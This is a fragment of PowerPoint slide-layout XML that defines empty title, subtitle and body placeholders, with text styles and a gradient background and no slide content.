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Lst>
  <p:sldSz cy="51435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 name="Shape 32"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 3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 name="Shape 3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8" name="Shape 8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4" name="Shape 9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2" name="Shape 10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9" name="Shape 10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6" name="Shape 11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3" name="Shape 12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0" name="Shape 13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6" name="Shape 13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3" name="Shape 14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0" name="Shape 15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 name="Shape 38"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 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0" name="Shape 4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7" name="Shape 15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4" name="Shape 16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1" name="Shape 17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7" name="Shape 17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3" name="Shape 18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0" name="Shape 19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7" name="Shape 19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4" name="Shape 20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1" name="Shape 21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8" name="Shape 21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 name="Shape 44"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 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6" name="Shape 4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5" name="Shape 22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1" name="Shape 23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7" name="Shape 23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5" name="Shape 24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1" name="Shape 25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8" name="Shape 25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6" name="Shape 26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3" name="Shape 27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1" name="Shape 28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7" name="Shape 28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2" name="Shape 5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3" name="Shape 29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9" name="Shape 29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5" name="Shape 30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1" name="Shape 31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7" name="Shape 31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3" name="Shape 32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1" name="Shape 33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8" name="Shape 33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6" name="Shape 34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53" name="Shape 35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8" name="Shape 5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0" name="Shape 36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4" name="Shape 364"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Shape 3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6" name="Shape 36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3" name="Shape 37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80" name="Shape 38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88" name="Shape 38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94" name="Shape 39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01" name="Shape 40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07" name="Shape 40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15" name="Shape 41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0" name="Shape 420"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 4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22" name="Shape 42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4" name="Shape 6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6" name="Shape 426"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Shape 4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28" name="Shape 42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34" name="Shape 43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2" name="Shape 442"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Shape 4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44" name="Shape 44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0" name="Shape 450"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Shape 4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52" name="Shape 45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7" name="Shape 457"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Shape 4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59" name="Shape 45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6" name="Shape 466"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Shape 4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68" name="Shape 46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5" name="Shape 475"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Shape 4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77" name="Shape 47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3" name="Shape 483"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Shape 4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85" name="Shape 48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3" name="Shape 493"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Shape 4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95" name="Shape 49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5" name="Shape 505"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="Shape 5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07" name="Shape 50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0" name="Shape 7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5" name="Shape 515"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Shape 5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17" name="Shape 51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1" name="Shape 521"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Shape 5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23" name="Shape 52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7" name="Shape 527"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Shape 5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29" name="Shape 52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4" name="Shape 534"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Shape 5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36" name="Shape 53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2" name="Shape 542"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Shape 5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44" name="Shape 54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1" name="Shape 551"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Shape 5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53" name="Shape 55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9" name="Shape 559"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Shape 5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61" name="Shape 56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5" name="Shape 565"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Shape 5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67" name="Shape 56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3" name="Shape 573"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Shape 5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75" name="Shape 57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0" name="Shape 580"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Shape 5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82" name="Shape 58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6" name="Shape 7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8" name="Shape 588"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Shape 5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90" name="Shape 59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6" name="Shape 596"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Shape 5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98" name="Shape 59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7" name="Shape 607"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Shape 6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09" name="Shape 60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9" name="Shape 619"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Shape 6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21" name="Shape 62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5" name="Shape 625"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Shape 6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27" name="Shape 62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2" name="Shape 632"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Shape 6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34" name="Shape 63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9" name="Shape 639"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Shape 6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41" name="Shape 64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6" name="Shape 646"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="Shape 6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48" name="Shape 64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3" name="Shape 653"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Shape 6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55" name="Shape 65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0" name="Shape 660"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Shape 6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62" name="Shape 66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2" name="Shape 8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7" name="Shape 667"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Shape 6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69" name="Shape 66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4" name="Shape 674"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="Shape 6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76" name="Shape 67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1" name="Shape 681"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Shape 6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83" name="Shape 68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7" name="Shape 687"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Shape 6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89" name="Shape 68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txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1583342"/>
            <a:ext cx="7772400" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 11"/>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2" name="Shape 12"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205978"/>
            <a:ext cx="8229600" cy="8574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4" name="Shape 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3725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5" name="Shape 15"/>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6" name="Shape 16"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205978"/>
            <a:ext cx="8229600" cy="8574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8" name="Shape 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="3994500" cy="3725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9" name="Shape 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692273" y="1200150"/>
            <a:ext cx="3994500" cy="3725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0" name="Shape 20"/>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1" name="Shape 21"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205978"/>
            <a:ext cx="8229600" cy="8574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3" name="Shape 23"/>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4" name="Shape 24"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4406309"/>
            <a:ext cx="8229600" cy="519599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 26"/>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7" name="Shape 27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 28"/>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chemeClr val="lt1"/>
            </a:gs>
            <a:gs pos="30000">
              <a:schemeClr val="lt1"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="lt2"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:grad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05978"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
